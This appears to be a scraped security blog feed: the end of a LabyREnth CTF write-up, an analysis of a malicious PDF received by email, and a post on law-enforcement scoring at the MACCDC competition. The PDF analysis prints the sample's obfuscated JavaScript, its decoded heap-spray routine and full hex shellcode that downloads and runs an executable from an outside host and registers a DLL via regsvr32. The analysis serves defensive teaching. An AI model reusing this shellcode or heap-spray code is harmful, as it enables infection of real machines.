That snap was a vessel in my forehead. I thought I was missing something obvious, but there it is. The correct MAC address was one from a Parallels environment, even though it appeared the program was ruling out Parallels as a viable environment. I think? Now I'm doubting myself. Whatever, that was the correct MAC segment (00-1c-42-92-df-??). I used that to decrypt the PNG and received my answer:


Oh, but our story didn't end there. Mac OS X is my preferred environment, especially for this type of work. And my MacBook is actually a company-owned asset, as is normal for all of us. However, it's also a company-managed asset and my company is Carbon Black, who makes endpoint protection products. When I saw the VM checking, and had verified the code wasn't malicious, I ran it on my host instead of in a VM. So, it shouldn't have been a surprise when, during analysis, our Security Operations team knock on my virtual door to see what I was doing.

Threat hunting had found a binary running on my system, encrypting files. Well, technically just one file, but it looked suspicious.


OK. No problem, can explain that away. But the binary has a 17/56 score on VirusTotal...


Yeah, that's a bit harder. To its credit, most AV engines have it marked up as "RansomLabyrenth", so it's kind of evident where it came from. If you know what LabyREnth is... But kudos to the blue team for detecting me. If I had only known that the challenge would've run properly in the VM with Hopper.


Random #3 Dogs


The random track was some of my favorite in this year's LabyREnth. They also took the 'random' to heart with challenges that were all from left field. Many times it was the same style of data decoding but in an unusual format, but the one that I loved was the Dogs challenge (Random #3). If you're reading this for an insightful post on how to solve it, I'll just go ahead and disappoint you. You're not going to get it.

Dogs was found by discovering and following a blind hallway in the World Map. At the end you find yourself alongside a cute little puppy. By 'pet'ting the dog you get the challenge:

The puppy purrs because he thinks he's a cat. You realize he's communicating with you telepathically, and sending you information about a challenge!
Hint: DoGz-CeNtRaL presents a fine new release:[DoGz-CeNtRaL] DOGS.THE.MOVIE.2017.DVDRIP.iso. The menus can be a little tricky.
Author: @gabe_k




Sure enough, you're presented with a DVD ISO with a menu system showing dogs. Lots of dogs. Dogstravaganza. If you click the wrong dog, you see a dog falling in the water. If you select the right dog, he balances an egg on his nose.



Looking into the structure of the DVD you'll see the standard DVD files as well as a Flag.mp4. Playing Flag.mp4 showed nothing but a few seconds of black, so I used VLC to separate each frame into a PNG. The result was 121 PNGs of frames, but only of two unique types. Frames 1-13 were all hash duplicates of each other, and 14-121 were all hash duplicates of each other. At only ~1-2Kb each, there was nothing that seemed of consequence, so I ignored it.

Analysis of the VIDEO_TS.BUP shows it was developed with DVDAuthor 0.7.1. So, after an hour of unsucessfully trying to install it in Mac, I spun up an old Linux VM and used the newly installed dvdauthor application to unpack the DVD.




The results were a single XML script file and a series of 29 MPEG VOBs (vob_00m_001 - 029.vob). vob_01t_001.vob is the video of the dog falling in water and vob_01t_002.vob is the video of the dog balancing an egg.  The next step seems straight forward, just get the correct letter from each video frame. Not easily done. After extracting out each frame, you can vaguely see an impression of each letter as well as some unknown blocks that seem to correlate to the menu buttons:


See it?  How's this... (MSPaint is deprecated not removed)


But, the order of frames doesn't add up. "P" isn't first, and the frames just seem alphabetical order. The 29 frames account for the 26 A-Z letters plus "_{}". Pulling the results from dvdauthor.xml shows the DVD menu's scripting system, something completely new to me.  A segment below (portions removed for brevity):



<menuslang="en">
<video/>
<audiolang="en"format="ac3"/>
<subpicturelang="en"/>
<!--Menu1/29-->
<pgc>
<audioid="0"/>
<subpictureid="0"/>
<pre>
g13=g1;
g13=g13and4095;
if(g13!=101){
gotol7;
}
if(g0le0){
gotol7;
}
button=g0;
gotol8;
l7:
button=1k;<!--buttonno1-->
l8:
g1=101;
</pre>
<vobfile="vob_00m_001.vob">
<buttonsstart="0:00:00.000">
<buttonname="1">
g15=1;
jumppgctail;
</button>
<buttonname="2">
g15=2;
jumppgctail;
</button>
<buttonname="3">
g15=3;
jumppgctail;
</button>
<buttonname="4">
g15=4;
jumppgctail;
</button>
<buttonname="5">
g15=5;
jumppgctail;
</button>
<buttonname="6">
g15=6;
jumppgctail;
</button>
</buttons>
<cellstart="0:00:00.000"program="1"pause="inf"/>
</vob>
<post>
g14=g15;
g15=0;
if(g14==1){
gotol29;
}
if(g14==2){
gotol31;
}
if(g14==3){
gotol33;
}
if(g14==4){
gotol35;
}
if(g14==5){
gotol37;
}
if(g14==6){
gotol39;
}
if(g6!=6){
gotol12;
}
if(g14==7){
g6=7;
}
if(g14==7){
gotol41;
}
l12:
if(g14==7){
gotol39;
}
if(g14==8){
gotol43;
}
if(g14==9){
gotol45;
}
if(g14==10){
gotol47;
}
if(g14==11){
gotol49;
}
if(g14==12){
gotol51;
}
if(g6!=1){
gotol21;
}
if(g14==13){
g6=2;
}
if(g14==13){
gotol53;
}
l21:
if(g14==13){
gotol30;
}
if(g14==14){
gotol55;
}
if(g14==15){
gotol57;
}
if(g14==16){
gotol59;
}
if(g14==17){
gotol61;
}
if(g14==18){
gotol63;
}
if(g14==19){
gotol65;
}
exit;
l29:
g0=button;
l30:
jumptitle1;
l39:
g0=button;
jumptitle1;
l41:
g0=button;
jumptitle10;
l43:
g0=button;
jumptitle1;
l53:
g0=button;
jumptitle15;
</post>
</pgc>

Wow! OK, so there are 19 buttons. Each button can use jumps to change to new titles, but can also do post-scripting to move values while also checking its current state.

This one was actually easily solved. Because, I'm going to disappoint. I started poking at this while in Montreal for REcon. I then finished while being stranded in the Montreal airport for a day and a half due to massive storms in the US Northeast. So, I sat at a US-Southern-BBQ place in a Canadian airport, eating BBQ Rib Poutine and cheap beer, and just clicked them all. I broke the menu into quadrants to map out the buttons on paper. I then just clicked them all. Once I found one that worked, I took a VM snapshot. If I failed, I just reverted back.




It took roughly 1-2 minutes per letter and within an hour of drinking I had the answer:

PAN{RIP_AIR_BUD}



But I definitely want to read some write-ups on this one. The DVD language looks really cool, and I have an idea behind how to do it.


That's it. Some of the more interesting challenges that I liked. And I'm looking forward to 2018's LabyREnth!

Malicious PDF Analysis: Reverse code obfuscation

$
0
0
I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated / escaped variable names. You can see a reference to "n" but nowhere where it is initialized. Instead, you see variables named "& # 000119;" and ""& # 000110;". These are the ASCII decimal values for "w" and "n" respectively. Additionally, mathematical operators, like "& lt;" are escaped as HTML "<". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x + 'v'+'al';, making q = "eval".

But, what about that large block of data? And what is up with that unusual "cc" variable that contains a large list of characters. By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that reference each individual character, each separated by a "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But, even with layer of obfuscation, a quick Python script makes short work of it:
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    result=""
    for i in arr.split("@"):result += cc[int(i)]
    print result
When run, voila! Our obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is actually binary data stored as plaintext hex, where every two bytes equals the hexadecimal value for the binary character. Copying and pasting the data into a hex editor can convert it to binary.

Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straight forward. It's a simple downloader with the URL in plain text (Similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well trained eye can see additional strings appear, typically as four bytes of op-code following by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move this 4-bytes of data into a memory register at X location"). A visual analysis shows the command line: "regsvr32 -s wpbt.dll", as well as a DLL call "urlmon" (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially instills a DLL into the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyse the exploit of the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I did this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;1
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls I2() that makes a block of text that is "QUFB" 10,984 times.
_l10 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes refer to the file header of a TIFF graphic image. Oh, and those 10,984 "QUFB"'s? Those Base64 decode to "0x414141". That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches help lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.

Enforcing the Law at the Mid Atlantic Collegiate Cyber Defense Competition (MACCDC)

$
0
0
The MidAtlantic Collegiate Cyber Defense Competition (MACCDC) is one of the many regional CCDCs that includes a somewhat unique aspect: law enforcement and investigations. For those unfamiliar with CCDC's, they are live network security competitions where schools face off against each other, and a red cell of pentesters, to build and maintain a secure network. While fending off attacks the teams are responsible for creating new servers and services while performing business operations, such as running database queries for a business need. If the respective database is misconfigured, or hijacked by Red Team, then the query cannot be performed and teams suffer major score losses.

There are multiple regional CCDC competitions across the entire country as well as the National CCDC where the winners of each regional competition join to face off against each other. While each regional follows the same structure of competition, each can make slight adjustments to how they determine a winner. A law enforcement (LE) component was built into MACCDC years ago as a method to help expose competitors to the unique and frustrating challenges of fully documenting attacks.

In many competitions, schools practice on being extremely responsive to attacks and, in many cases, aggressive in their responses to remove an adversary as quickly as possible. While that effort is commendable, it does not translate into the actions taken by a real-world security team. In the event of a compromise, theft of data, or denial of service attack, corporate senior leadership will not be content with a message of "We were attacked, it's been fixed."


Questions will arise:

  • Who attacked us?
  • How did they get in?
  • What did they steal?
  • How long ago did they get in?
  • Are they still there?
  • Is this an attack also seen by industry partners?


Therefore, the role of MACCDC LE is to provide students the resources necessary to collect this evidence and document an incident that can be used to adequately describe the attack. Additionally, though infrequent, a well written incident report that clearly and accurately describes an attack, shows full logs of where the attack came from, and notes exact times of attack, can allow for Exercise Control to authorize a firewall block and a possible arrest of the Red Teamer involved.

Attacks are documented using a standard form that is supplied to the students at the start of the competition: the US Secret Service Incident Response Form 4017. This is a form that is used in actual investigations for law enforcement use, and was chosen as it contained an adequately wide number of scenarios to meet every attack used by Red Team.

In recent years, each team competiting in MACCDC has a requirement to complete at least two incident response forms by the end of the competition. While there is no limit to the number that can be submitted, each form does take time away from their other duties and each is additionally graded on the "worthiness" of law enforcement. They are then left to document any incident of their choosing with as much possible detail as they can.

Many teams who struggle often limit themselves with reports on suspicions of an attack. They see errant log entries, or information that doesn't look appropriate, and immediately jump into IR mode. After 30 minutes of detailing the log entries, they then learn the hard pressure of proving an attack to law enforcement.

There are many categories in which LE scores each team's submissions, with an ultimate value of 140 points given. These include 10 points in each of the following categories:


  • Attack clearly defined
  • Scope of attack clearly defined
  • Time window clearly defined
  • Source of attack identified
  • Delivery mechanism identified
  • Damage assessment provided
  • Remediation efforts explained
  • Appropriate evidence provided
  • Timeliness of report
  • Clarity of submission
  • Clear handwriting and presentation
  • Understandable grammar
  • Completeness
  • Accuracy of report

Additionally, each report has a subjective negative score of "Waste of Tax Payer Money". This last one allows for LE to weigh in on poorly written submissions. And, as LE can provide feedback to improve submissions, teams that overwhelmingly request help from LE to submit a report that ultimately has no value can face a negative score.

The grand prize that teams rarely see if an arrest made, rewarding 500 extra points. Given enough evidence, and indicators that can point to an actual hands-on-keyboard person, LE can make an arrest of a Red Teamer. The Red Teamer will be pulled from the team, their computers disconnected, and forced to sit in time-out for 20 minutes. This is often done within the competition pit itself to face public ridicule. In the past, arrests have been made based upon Red Teamers publicly documenting their attacks and the students positively identifying their systems in tweets. Students could also see unique names, handles, and identifying indicators in their attacks. Often, if a team can positively identify a very unique computer in use, via User-Agent value or similar, LE can do a probable cause search and see if they can spot the computer in the Red Team room. Most times students attempt to do this but are usually off slightly in their assessment. LE knows who the real attacker is, but if the evidence points to someone else, then the submission is of no use.


Based on these categories, here are some pitfalls and suggestions for teams:

Who attacked us?


It's easy to say "The Red Team over in the next room attacked us", but can you provide exactly who it was. Can you provide IP addresses that are unique to a certain attacker subset?

Can you prove the attack and actions taken?


Did they have the evidence of the attack stored? Are there logs or screenshots available? Are they in a method that can be given to law enforcement? If not, then they have no evidence of the attack. Some teams scramble to transcribe logs as quick as possible, while others take screenshots and copy log files to a separate system. In the case of the latter, we stop by with a USB drive, collect the data, and review it along with the incident report. Best action is that as soon as you see signs of an attack start collecting logs, especially before they're erased by Red Team. Toward the end of the competition, when Red Team becomes more brazen, it becomes even more important for Blue Teams to take screenshots. After all, how do you appropriately describe literal ghosts following your cursor on the screen or that your Exchange server was replaced with a flying nyan cat? That's also the time when Red Teamers often get lax in OPSEC, making connections from their raw systems, using their personal handles in their attacks, or bragging about them on Twitter.


Can they prove that the actions were malicious activity by an adversary and not the mistakes of an insider? "This is my team, we didn't do that." That's what they all say, prove it to me. Guess what? As LE, we can just go casually talk off-the-record to Red Team and verify if they did the attacks. Can they prove that it came from a very specific IP address, and that the IP is unique to an adversary and not to something like Scorebot?

Can you identify the source and delivery of an attack?


These are two very critical topics that many teams gloss over. What use is kicking an attacker out if you don't know how they got in? You're simply covering up the symptom but are still keeping any vulnerability wide open. By documenting the source of the attack, such as the offending IP address, a team can start creating a case of multiple attacks over a short period of time from the same source. Providing corresponding evidence from previous incident response forms can help set the foundation and allow easier points.

Additionally, the point of this exercise is to perform due diligence to identify threats and mitigate them. Many times the symptoms are reported upon, but teams don't put the extra five minutes in to determine how attacks started. Either via SMB connections, RDP, SSH, or bad passwords, documenting this shows not just a response but the building of an attacker profile. 

Evidence should be relevant and specific to the attack. If a Red Teamer got onto a Linux server, are there log entries for SSH brute forcing or does it show a direct login? There are different meanings, and different types of remediation, for each. Are there .bash_history files available to describe what commands were typed by the Red Teamer to show what their goals were? A brute force attempt will typically result in little actual activity, just the creation of an additional user account or application for back dooring. It will, however, create numerous log entries.

For Windows, can you find events within Event Logs to show signs of access, such as Type 10 logons (Remote Interactive Sessions) and Type 3 (connection to a shared CIFS/SMB folder). A Windows server that's come back from a reboot will have it's SYSTEM hive freshly stored to the hard drive, containing details from ShimCache to show commands executed.

Can we make our indicators shareable?


In recent years we have experimented with methods to implement threat intel into the competition, including methods for sharing indicators. As each team represents a business within the same industry as others, there's an expectation of shared attackers targeting their vertical. In the past we've made use of notifications similar to the FBI Flash Alerts. If a specific indicator or TTP is identified by at least two teams then a high level description of that TTP is provided to all teams.

For example, teams identify that a scheduled task is created for specific malware on all their systems. Multiple teams report the same method, naming conventions, and files on their system. A flash alert is created to notify that "malware has been seen being entrenched via Windows scheduled tasks." Teams are then on their own to use that information, disregard it, or figure out how to even relevant to their work (at times that indicator doesn't even exist on a particular team's network but they'll spend over an hour trying to find it).

Tools for analysis


CCDC events have great restrictions on the software that can be used in competition. However, most tools that are needed are already on the system or available as open-source. In the field, one's best tools are simply grep and awk. Grep will be used continually to find entries in log files, and works best with the -A, -B, and -C options which are, in order, show X lines after the match, show X lines before the match, and show X lines before and after the match. Even Windows has similar with findstr.exe!

Awk is a necessary skill to practice to take large amounts of logs and distill them down to usable data. If you're reviewing the messages log file on Linux, the output can be quite long. However, a grep for certain entries where you know the critical data is always in the first, second, and fifth columns, can reduce the display down to minimal information for quick response.

On Linux and Unix environments, many students block their own analysis by relying on standard commands, like `ls` to see times. Move beyond that. Use `stat` to see all meta for a given file. Use `find` in creative ways to watch for attacks. `find ~/ -type f -mtime -1` will quickly show any files modified within the last day while `find /etc -type f -cmin -10` will show every file from /etc created within the last 10 minutes. 

Learn your operating system! We're just taking existing tool sets and using the command line to chain data together, manipulating and sorting it, as a means to answer very simple questions.

When we create the Law Enforcement team for MACCDC we don't just bring together a few volunteers. We bring together experience, knowledge, skill, from those who have done the work. Some of us have done IR as part of commercial consulting, some for criminal law enforcement cases, others for detection and response within corporate environments. 


There is no magic here. There are no 'gotchas'. Attacks are realistic and so are the demands. The data exists to do investigations, and to even do them quickly. Some of the teams more experienced in this field have been able to document a full attack, from SSH brute force to privilege escalation to rootkit installation in real-time, providing a report mere minutes after removing the malware and patching their system. 

That is the necessary skill to learn.

Malicious PDF Analysis: Reverse code obfuscation

$
0
0
I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

